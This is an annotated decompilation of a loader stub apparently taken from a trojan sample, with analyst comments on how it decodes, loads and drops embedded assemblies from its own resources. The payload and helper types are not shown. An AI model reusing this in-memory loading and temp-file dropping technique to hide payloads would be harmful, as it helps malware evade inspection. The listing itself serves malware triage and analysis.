// Decompiled with JetBrains decompiler
// Type: .
// Assembly: RC4STUB, Version=1.0.0.0, Culture=neutral, PublicKeyToken=4bd99f8fe4adcd07
// MVID: DA5B8577-1DEE-425A-83B8-F58DDD172F9B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Llac.ajli-ac41d99cde54e36a4e446e9c8d3aecae2cd439033b269019f516b141753fb0e6.exe
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
// Analyst note: every identifier below is the decompiler's rendering of an unprintable
// obfuscated name, so unrelated members share one spelling (several methods are all
// "\u0003", two struct fields are both "\u0001"). Which member a reference denotes has
// to be read from its signature and use; the listing does not recompile as shown.
namespace \u0003
{
  /// <summary>
  /// Resolver stub that satisfies assembly-load requests from manifest resources
  /// embedded in this executable. It hooks <c>AppDomain.AssemblyResolve</c>, looks the
  /// requested name up in a comma-separated table returned by the string helper
  /// (index 353), and loads the matching resource from memory or through a temporary
  /// file under the user's temp path.
  /// </summary>
  /// <remarks>
  /// NOTE(review): the flag letters, the name table and the temp-file fallback resemble
  /// the dependency-embedding resolver emitted by commercial .NET protectors; confirm by
  /// decoding the string table. The string helper (<c>\u0001.\u0003.\u0003(int)</c>) and
  /// the two helpers in other types are not part of this listing. For triage, the
  /// resources this stub loads presumably hold the code of interest, not the stub itself.
  /// </remarks>
  internal class \u0002
  {
    // Cache of assemblies already resolved, keyed by resource name (see the
    // ContainsKey/Add calls in the resolver). The same object is used as the lock.
    private static Hashtable \u0001 = new Hashtable();

    // P/Invoke for kernel32!MoveFileEx. The only calls in this listing pass a null
    // destination and flag value 4 (MOVEFILE_DELAY_UNTIL_REBOOT), which asks Windows to
    // delete the path at the next boot. Windows records such requests in the Session
    // Manager "PendingFileRenameOperations" registry value, a useful forensic artifact.
    [DllImport("kernel32", EntryPoint = "MoveFileEx")]
    private static extern bool \u0003([In] string obj0, [In] string obj1, [In] int obj2);

    /// <summary>
    /// Reports whether the current process's main module file name, lower-cased, equals
    /// either of two strings returned by the string helper (indices 319 and 332).
    /// </summary>
    /// <returns>True on a match; false otherwise, including when any exception occurs.</returns>
    // NOTE(review): presumably a host-process check; the two decoded names are not
    // visible here, so decode them before drawing conclusions.
    [SpecialName]
    internal static bool \u0003()
    {
      try
      {
        string lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
        if (lower == \u0001.\u0003.\u0003(319))
          return true;
        if (lower == \u0001.\u0003.\u0003(332))
          return true;
      }
      catch (Exception ex)
      {
        // Deliberately swallowed: a failed lookup is treated as "no match".
      }
      return false;
    }

    /// <summary>
    /// Installs the resolver and, under two conditions, pre-extracts resources flagged 'f'.
    /// </summary>
    /// <remarks>
    /// The AssemblyResolve handler is always registered. The extraction loop runs only
    /// when the executing assembly was loaded from the GAC and the process-name check
    /// above returns true. Every failure is swallowed, so the method never throws.
    /// </remarks>
    internal static void \u0003()
    {
      try
      {
        // Here "\u0003.\u0002.\u0003" is the (object, ResolveEventArgs) overload below.
        AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0003.\u0002.\u0003);
        if (!Assembly.GetExecutingAssembly().GlobalAssemblyCache || !\u0003.\u0002.\u0003())
          return;
        // Table layout: even slots hold Base64(UTF-8 assembly name), odd slots hold
        // "[flags]resourceName". A trailing unpaired entry is ignored by the loop bound.
        string[] strArray = \u0001.\u0003.\u0003(353).Split(',');
        for (int index = 0; index < strArray.Length - 1; index += 2)
        {
          try
          {
            string str1 = Encoding.UTF8.GetString(Convert.FromBase64String(strArray[index]));
            string str2 = strArray[index + 1];
            if (str2.Length > 0)
            {
              if (str2[0] == '[')
              {
                int num = str2.IndexOf(']');
                string str3 = str2.Substring(1, num - 1);
                string name = str2.Substring(num + 1);
                // 'z' selects the byte[] -> byte[] transform below; 'f' selects this
                // extract-to-disk path. Entries without 'f' are left to the resolver.
                bool flag = str3.IndexOf('z') >= 0;
                if (str3.IndexOf('f') >= 0)
                {
                  Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
                  if (manifestResourceStream != null)
                  {
                    int length = (int) manifestResourceStream.Length;
                    byte[] buffer = new byte[length];
                    manifestResourceStream.Read(buffer, 0, length);
                    // Helper lives in another type not shown here.
                    // NOTE(review): presumably decompression or decryption (the
                    // assembly is named RC4STUB) - confirm against that type.
                    if (flag)
                      buffer = \u0002.\u0003.\u0003(buffer);
                    try
                    {
                      // Directory path = format string (index 571) applied to the temp
                      // path and the resource name; file name = a field of the parsed
                      // name (presumably the simple name) plus a suffix (index 584).
                      string path1 = string.Format(\u0001.\u0003.\u0003(571), (object) Path.GetTempPath(), (object) name);
                      Directory.CreateDirectory(path1);
                      \u0003.\u0002.\u0001 obj = new \u0003.\u0002.\u0001(str1);
                      string path2 = path1 + obj.\u0001 + \u0001.\u0003.\u0003(584);
                      if (!File.Exists(path2))
                      {
                        FileStream fileStream = File.OpenWrite(path2);
                        fileStream.Write(buffer, 0, buffer.Length);
                        fileStream.Close();
                      }
                      // Helper in another type, given the dropped file's path; its
                      // effect is not visible in this listing.
                      \u0003.\u0003.\u0003(path2);
                      try
                      {
                        // Cleanup of the dropped file and its directory. Failures are
                        // ignored, so leftovers can remain under the temp path.
                        File.Delete(path2);
                        Directory.Delete(path1);
                      }
                      catch
                      {
                      }
                    }
                    catch (Exception ex)
                    {
                    }
                  }
                }
              }
            }
          }
          catch (Exception ex)
          {
            // A malformed table entry (bad Base64, missing ']') only skips that entry.
          }
        }
      }
      catch (Exception ex)
      {
      }
    }

    /// <summary>
    /// AssemblyResolve handler: maps the requested assembly name to an embedded
    /// resource and returns the loaded assembly.
    /// </summary>
    /// <param name="obj0">Event sender; not used.</param>
    /// <param name="obj1">Resolve arguments; only <c>Name</c> is read.</param>
    /// <returns>
    /// The cached or newly loaded assembly; null when the name is not in the table or
    /// the resource stream is missing. The final load result is returned as-is and may
    /// itself be null.
    /// </returns>
    internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
    {
      \u0003.\u0002.\u0001 obj = new \u0003.\u0002.\u0001(obj1.Name);
      // Table keys are Base64 of the display name built without the version part.
      string base64String1 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0003(false)));
      string[] strArray = \u0001.\u0003.\u0003(353).Split(',');
      string str1 = string.Empty;
      bool flag1 = false;
      bool flag2 = false;
      bool flag3 = false;
      for (int index = 0; index < strArray.Length - 1; index += 2)
      {
        if (strArray[index] == base64String1)
        {
          str1 = strArray[index + 1];
          break;
        }
      }
      // Second lookup, keyed by a single parsed field (presumably the bare simple
      // name), tried only when the first lookup missed and the 15-character-prefix
      // component of the request is empty.
      if (str1.Length == 0 && obj.\u0003.Length == 0)
      {
        string base64String2 = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
        for (int index = 0; index < strArray.Length - 1; index += 2)
        {
          if (strArray[index] == base64String2)
          {
            str1 = strArray[index + 1];
            break;
          }
        }
      }
      if (str1.Length > 0)
      {
        if (str1[0] == '[')
        {
          // Flag letters inside "[...]": 'z' = apply the byte transform, 'g' = drop to
          // disk and load by full name, 't' = skip the in-memory load and use a file.
          int num = str1.IndexOf(']');
          string str2 = str1.Substring(1, num - 1);
          flag1 = str2.IndexOf('z') >= 0;
          flag2 = str2.IndexOf('g') >= 0;
          flag3 = str2.IndexOf('t') >= 0;
          str1 = str1.Substring(num + 1);
        }
        lock (\u0003.\u0002.\u0001)
        {
          // Serve repeat requests from the cache.
          if (\u0003.\u0002.\u0001.ContainsKey((object) str1))
            return (Assembly) \u0003.\u0002.\u0001[(object) str1];
        }
        Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
        if (manifestResourceStream != null)
        {
          int length = (int) manifestResourceStream.Length;
          byte[] numArray = new byte[length];
          manifestResourceStream.Read(numArray, 0, length);
          // Same transform helper as in the extraction loop; defined outside this
          // listing. NOTE(review): presumably decompression or decryption - confirm.
          if (flag1)
            numArray = \u0002.\u0003.\u0003(numArray);
          if (flag2)
          {
            try
            {
              string path1 = string.Format(\u0001.\u0003.\u0003(571), (object) Path.GetTempPath(), (object) str1);
              Directory.CreateDirectory(path1);
              string path2 = path1 + obj.\u0001 + \u0001.\u0003.\u0003(584);
              // Nothing happens on this path when the file already exists.
              if (!File.Exists(path2))
              {
                Assembly assembly = (Assembly) null;
                FileStream fileStream = File.OpenWrite(path2);
                fileStream.Write(numArray, 0, numArray.Length);
                fileStream.Close();
                // When the external helper reports success, the assembly is loaded by
                // display name (version included) rather than from the dropped file.
                // NOTE(review): presumably the helper registers the file so that a
                // by-name load succeeds (e.g. a GAC install) - confirm in that type.
                if (\u0003.\u0003.\u0003(path2))
                  assembly = Assembly.Load(obj.\u0003(true));
                File.Delete(path2);
                Directory.Delete(path1);
                if ((object) assembly != null)
                {
                  lock (\u0003.\u0002.\u0001)
                  {
                    // Prefer an entry another thread cached in the meantime.
                    if (\u0003.\u0002.\u0001.ContainsKey((object) str1))
                      assembly = (Assembly) \u0003.\u0002.\u0001[(object) str1];
                    else
                      \u0003.\u0002.\u0001.Add((object) str1, (object) assembly);
                  }
                  return assembly;
                }
              }
            }
            catch
            {
              // Any failure on the 'g' path falls through to the loads below.
            }
          }
          Assembly assembly1 = (Assembly) null;
          if (!flag3)
          {
            try
            {
              // In-memory load: the assembly bytes never touch disk on this path.
              assembly1 = Assembly.Load(numArray);
            }
            catch (FileLoadException ex)
            {
              // Fall back to the temp-file path.
              flag3 = true;
            }
            catch (BadImageFormatException ex)
            {
              flag3 = true;
            }
          }
          if (flag3)
          {
            try
            {
              string path3 = string.Format(\u0001.\u0003.\u0003(571), (object) Path.GetTempPath(), (object) str1);
              Directory.CreateDirectory(path3);
              string path4 = path3 + obj.\u0001 + \u0001.\u0003.\u0003(584);
              if (!File.Exists(path4))
              {
                FileStream fileStream = File.OpenWrite(path4);
                fileStream.Write(numArray, 0, numArray.Length);
                fileStream.Close();
                // MoveFileEx(path, null, 4): schedule the file, then its directory,
                // for deletion at next boot. Until then both stay under the temp path.
                \u0003.\u0002.\u0003(path4, (string) null, 4);
                \u0003.\u0002.\u0003(path3, (string) null, 4);
              }
              assembly1 = Assembly.LoadFile(path4);
            }
            catch
            {
            }
          }
          // Cached even when both load attempts failed and assembly1 is still null.
          lock (\u0003.\u0002.\u0001)
            \u0003.\u0002.\u0001.Add((object) str1, (object) assembly1);
          return assembly1;
        }
      }
      return (Assembly) null;
    }

    /// <summary>
    /// Parsed form of a comma-separated assembly display name.
    /// </summary>
    // NOTE(review): the prefix lengths used by the constructor (8, 8 and 15 characters)
    // match "Version=", "Culture=" and "PublicKeyToken=", the display-name format shown
    // in the decompiler header of this file; the prefixes themselves come from the
    // string helper and are not visible here - confirm by decoding indices 674/687/700.
    internal struct \u0001
    {
      // Receives any component that matches none of the three prefixes.
      public string \u0001;
      // Parsed from the component that follows the first 8-character prefix.
      public Version \u0001;
      // Component after the second 8-character prefix; empty when it equals the
      // placeholder at string index 627.
      public string \u0002;
      // Component after the 15-character prefix; empty when it equals the placeholder
      // at string index 665.
      public string \u0003;

      /// <summary>
      /// Rebuilds a display-name string from the parsed fields.
      /// </summary>
      /// <param name="obj0">When true, the version part (separator 593 plus the Version
      /// field) is included.</param>
      /// <returns>The first field, the optional version part, then the two remaining
      /// components, each preceded by its separator; an empty component is replaced by
      /// its placeholder string.</returns>
      public string \u0003([In] bool obj0)
      {
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.Append(this.\u0001);
        if (obj0)
        {
          stringBuilder.Append(\u0001.\u0003.\u0003(593));
          stringBuilder.Append((object) this.\u0001);
        }
        stringBuilder.Append(\u0001.\u0003.\u0003(610));
        stringBuilder.Append(this.\u0002.Length == 0 ? \u0001.\u0003.\u0003(627) : this.\u0002);
        stringBuilder.Append(\u0001.\u0003.\u0003(640));
        stringBuilder.Append(this.\u0003.Length == 0 ? \u0001.\u0003.\u0003(665) : this.\u0003);
        return stringBuilder.ToString();
      }

      /// <summary>
      /// Parses a display name by splitting on ',' and classifying each trimmed
      /// component by its prefix.
      /// </summary>
      /// <param name="obj0">Display name to parse, for example the <c>Name</c> of a
      /// resolve request.</param>
      public \u0001([In] string obj0)
      {
        // Defaults for all four fields; the two "\u0001" assignments target the
        // Version field and the string field respectively.
        this.\u0001 = new Version();
        this.\u0002 = string.Empty;
        this.\u0003 = string.Empty;
        this.\u0001 = string.Empty;
        string str1 = obj0;
        char[] chArray = new char[1]{ ',' };
        foreach (string str2 in str1.Split(chArray))
        {
          string str3 = str2.Trim();
          if (str3.StartsWith(\u0001.\u0003.\u0003(674)))
            this.\u0001 = new Version(str3.Substring(8));
          else if (str3.StartsWith(\u0001.\u0003.\u0003(687)))
          {
            this.\u0002 = str3.Substring(8);
            // The placeholder value is normalised to an empty string.
            if (this.\u0002 == \u0001.\u0003.\u0003(627))
              this.\u0002 = string.Empty;
          }
          else if (str3.StartsWith(\u0001.\u0003.\u0003(700)))
          {
            this.\u0003 = str3.Substring(15);
            if (this.\u0003 == \u0001.\u0003.\u0003(665))
              this.\u0003 = string.Empty;
          }
          else
            this.\u0001 = str3;
        }
      }
    }
  }
}